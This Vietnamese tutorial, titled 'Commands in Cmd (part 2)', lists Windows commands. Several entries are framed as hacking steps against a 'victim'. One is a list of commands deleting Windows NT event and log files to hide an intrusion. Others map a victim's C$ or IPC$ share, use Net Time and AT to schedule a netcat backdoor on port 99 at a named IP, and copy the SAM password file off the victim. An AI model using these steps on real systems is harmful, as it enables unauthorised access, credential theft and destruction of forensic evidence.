Các lệnh trong Cmd (phần 2)

11. Lệnh DIR:
Cú pháp: DIR [drive:][path][filename]
Công dụng: Để xem file, folder.
12. Lệnh DEL:
Cú pháp: DEL [drive:][path][filename]
Công dụng: Xóa một file, thông thường sau khi xâm nhập vào hệ thống, ta phái tiến hành xóa dấu vết của mình để khỏi bị phát hiện.Sau đây là những files nhật ký của Win NT:
Code:
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
13. Lệnh tạo ổ đĩa ảo trên computer:
Cú pháp: Net use z: \\ip\C$ ( hoặc là IPC$ )
Công dụng: Tạo 1 đĩa ảo trên máy tình của mình từ tài nguyên chia se trên mạng.Để hiểu hơn về lệnh này các bạn chú ý theo dõi các bài viết sau, tôi sẽ hưỡng dẫn kĩ hơn.
14. Lệnh Net Time:
Cú pháp: Net Time \\ip
Công dụng: Cho ta biết thời gian của victim, sau đó dùng lệnh AT để khởi động chương trình.

15. Lệnh AT:
Cú pháp: AT \\ip
Công dụng: Khởi động các ứng dụng trên máy victim
Ví dụ: ở đây tôi có con trojan tên nc.exe (NC là từ viết tắc của NETCAT....nó là một telnet server với port 99) và đc copy lên máy victim rồi. Đầu tiên ta cần biết thời gian của victim có IP là : 68.135.23.25 .
Code: Net Time \\68.135.23.25
Bây giờ nó sẽ phản hồi cho ta thời gian của victim, ví dụ : 12:00.
Code: AT \\68.135.23.25 12:3 nc.exe
Đợi đến 12:3 là nó sẽ tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99.
16. Lệnh Telnet:
Cú pháp: telnet host port
VD: telnet 68.135.23.25 99
Công dụng: Kết nối đến host qua port xx. Gõ telnet /? để biết thêm chi tiết.

17. Lệnh COPY:
Cú pháp: COPY [nguồn] [đích]
Công dụng: Copy file. Gõ copy/?để biết thêm.
Ví dụ:chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1
Code: Copy Index.html \\127.0.0.1\C$\index.html
nếu bạn copy lên folder winNt
Code: Copy index.html \\127.0.0.1\admin$\index.html
muốn copy files trên máy victm thì bạn gõ vào :
Code: Copy \\127.0.0.1\Admin$\repair\sam._c:\
18. Lệnh SET:
Cú pháp: SET
Công dụng: Displays, sets, or removes cmd.exe enviroment variables.

19. Lệnh Nbtstat:
Cú pháp: Nbtstat
Công dụng: Display protocol statistic and curent TCP/IP connections using NBT (netbios over TCP?IP). Gõ Nbtstat/? để biết rõ hơn.
20. Lệnh Date:
Cú pháp: Date /T
Công dụng:
Nếu chỉ gõ lệnh date thì hệ thống sẽ hiển thị ngày giờ hệ thống và yêu cầu bạn nhập ngày giờ mới để edit.
Nếu gõ lệnh date /t thì bạn chỉ coi thông tin về ngày giờ hệ thống
21. Lệnh xuất thông tin thành file *.txt:
Cú pháp: Câu lệnh >[drive]:\[path]\tenfile.txt
Công dụng: xuất một tham số nào đó ra 1 file text .
Ví dụ: bạn đánh lệnh sau:
Code: ipconfig >C:\myip.txt Hệ thống sẽ tạo ra file myip.txt lưu ở ổ đĩa C với thông tin là IP, Gateway, Subnet Mask

22. Lệnh openfiles:
Cú pháp: OpenFiles /Disconnect /ID id hoặc OpenFiles /Disconnect /A tên-truy-cập
Công dụng: Cho biết ai đang dùng các tập tin (thư mục) mà bạn đang chia sẽ trên hệ thống mạng